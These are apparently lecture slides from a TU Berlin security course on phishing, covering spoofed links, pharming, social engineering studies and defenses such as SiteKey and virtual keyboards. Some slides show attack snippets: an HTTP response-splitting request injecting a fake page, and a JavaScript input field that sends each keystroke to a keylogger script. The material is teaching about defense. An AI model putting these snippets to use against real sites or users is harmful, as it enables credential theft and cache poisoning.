is10 08 phishing.handout - tu berlin · 2016. 8. 31. · 1 1 phishing spoofedemails 2 a few...

14
1 1 Phishing Spoofed emails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates that the total financial losses attributable to phishing will total $2.8 bln in 2006” “Phishing and key-logging Trojans cost UK banks £12m” “Swedish bank hit by 'biggest ever' online heist” “Swedish Bank loses $1 Million through Russian hacker”

Upload: others

Post on 06-Mar-2021

1 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

1

1

Phishing

Spoofed emails

2

A Few Headlines

r “11.9 million Americans clicked on a phishingemail in 2005”

r “Gartner estimates that the total financial losses attributable to phishing will total $2.8 bln in 2006”

r “Phishing and key-logging Trojans cost UK banks £12m”

r “Swedish bank hit by 'biggest ever' online heist”

“Swedish Bank loses $1 Million through Russian hacker”

Page 2: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

2

3

MillerSmiles.co.uk

4

A Snapshot of a Friends Mailbox

[email protected]

Page 3: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

3

5

Typical Phishing Page

• Weird URL

• http instead of https

6

Or Even Like This

Page 4: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

4

7

A Closer Look

From: “Wells Fargo” <[email protected]>

<a target=“_blank”

href=“http://www.members.axion.net/~rod/.Wells.Fargo.com” >

https://online.wellsfargo.com/signon?LOB=CONS</a>

What you’ll see on the page Where the link actually goes

8

And You End Up Here

2006 (must be an old snapshot)

Page 5: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

5

9

Thank Goodness for IE 7.0 ☺

10

Phishing Techniques

r Use confusing URLs

m http://gadula.net/.Wells.Fargo.com/signin.html

r Use URL with multiple redirection

m http://www.chase.com/url.php?url=“http://phish.com”

r Host phishing sites on botnet zombies

m Move from bot to bot using dynamic DNS

r Pharming

m Poison DNS tables so that victim’s address (e.g., www.paypal.com) points to the phishing site

m URL checking doesn’t help!

Page 6: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

6

11

Bad Idea: Echoing User Input

r User input echoed in HTTP header

r For example, language redirect:

<% response.redirect(“/by_lang.jsp?lang=” +request.getParameter(“lang”) ) %>

r Browser sends

http://.../by_lang.jsp ? lang=french

r Server respondsHTTP/1.1 302

Date: …

Location: /by_lang.jsp ? lang=french

redirect

to here

12

r Malicious user requests

r Server responds:

HTTP Response Splitting

http://.../by_lang.jsp ? lang=

“french \n

Content-length: 0 \r\n\r\n

HTTP/1.1 200 OK

<Encoded URL of phishing page>”

HTTP/1.1 302

Date: …

` Location: /by_lang.jsp ? lang= french

Content-length: 0

HTTP/1.1 200 OK

Content-length: 217

Phishing page

Looks like a separate page

Page 7: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

7

13

Why?

r Attacker submitted a URL to victim.com

r Response from victim.com contains phishing page

r All cache servers along the path will store the phishing page as the cache of victim.com

r If an unsuspecting user of the same cache server requests victim.com, server will give him the cached phishing page instead

14

Trusted Input Path Problem

r Users are easily tricked into entering passwords into insecure non-password fields

<input type="text" name="spoof"

onKeyPress="(new Image()).src=

’keylogger.php?key=’ +

String.fromCharCode( event.keyCode );

event.keyCode = 183;” >

Sends

keystroke

to phisher

Changes character to *

Page 8: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

8

15

Social Engineering Tricks

r Create a bank page advertising an interest rate slightly higher than any real bank; ask users for their credentials to initiate money transfer

m Some victims provided their bank account numbers to “Flintstone National Bank” of “Bedrock, Colorado”

r Exploit social network

m Spoof an email from a Facebook or MySpace friend

• Read Jan 29 WSJ article about MySpace hack

m In a West Point experiment, 80% of cadets were deceived into following an embedded link regarding their grade report from a fictitious colonel

16

Experiments at Indiana University

r Reconstructed social network by crawling sites like Facebook, MySpace, LinkedIn and Friendster

r Sent 921 Indiana University students spoofed email (apparently from their friend)

r Email redirected to spoofed site asking user to enter his/her secure university credentials

m Domain name clearly distinct from indiana.edu

r 72% of students entered real credentials

m Males more likely if email sender is female

[Jagatic et al.]

Page 9: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

9

17

Victims’ Reactions (1)

r Anger

m Subjects called the experiment unethical, inappropriate, illegal, unprofessional, fraudulent, self-serving, useless

m Called for researchers conducting the study to be fired, prosecuted, expelled, or reprimanded

r Denial

m No posted comments with admission that writer was victim of attack

m Many posts stated that poster did not and would never fall for such an attack, and they were speaking on behalf of friends who had been phished

[Jagatic et al.]

18

Victims’ Reactions (2)

r Misunderstanding

m Many subjects were convinced that the experimenters hacked into their email accounts. They believed it was the only possible explanation for the spoofed messages.

r Underestimation of privacy risks

m Many subjects didn’t understand how the researchers obtained information about their friends, and assumed that the researchers accessed their address books

m Others, understanding that the information was mined from social network sites, objected that their privacy had been violated by the researchers who accessed the information that they had posted online

[Jagatic et al.]

Page 10: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

10

19

Defense #1: Internet Explorer 7.0

r “White list” of trusted sites

r Other URLs sent to Microsoft Responds with “Ok” or “Phishing!”

20

Defense #2: PassMark / SiteKey

If you don’t recognize your personalized

SiteKey, don’t enter your Passcode

Page 11: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

11

21

Defense #3: PIN Guard

Use your mouse to click the number, or

use your keyboard to type the letters

22

Defense #3A: Scramble Pad

Enter access code by typing

letters from randomly

generated Scramble Pad

Page 12: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

12

23

Defense #4: Virtual Keyboard

Use your mouse to select characters

from the virtual keyboard

24

Microsoft Passport

User

r Idea: Authenticate once, use everywhere

r Trusted third party issues identity credentials

r User uses them to access services over the Web

Sign on once

Receive Web identity

Access anynetwork service

Stores credit card numbers,personal information

.NET Passport

EmailMessenger

Web retailers

Page 13: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

13

25

History of Passport

r Launched in 1999m 2002, Microsoft claims > 200M accounts, 3.5 billion authentications each month

r Passport: Early Glitchesm Flawed password reset procedure

m Cross-scripting attack

r Current statusm From Directory of Sites at http://www.passport.net: “We have discontinued our Site Directory …”

m Monster.com dropped support in October 2004

m eBay dropped support in January 2005

m Seems to be fizzling out

26

Liberty Alliance

r Open-standard alternative to Passport

r Promises compliance with privacy legislation

r Long list of Liberty-enabled products

http://www.projectliberty.org

Page 14: IS10 08 phishing.handout - TU Berlin · 2016. 8. 31. · 1 1 Phishing Spoofedemails 2 A Few Headlines “11.9 million Americans clicked on a phishing email in 2005” “Gartner estimates

14

27

Defenses

r Use mutual authentication

r Non-Reusable credentials(not sufficient against man-in-the-middle attacks)

r Basic technical mechanism available

r Human interaction with these is a challenge!

r Security is a systems problem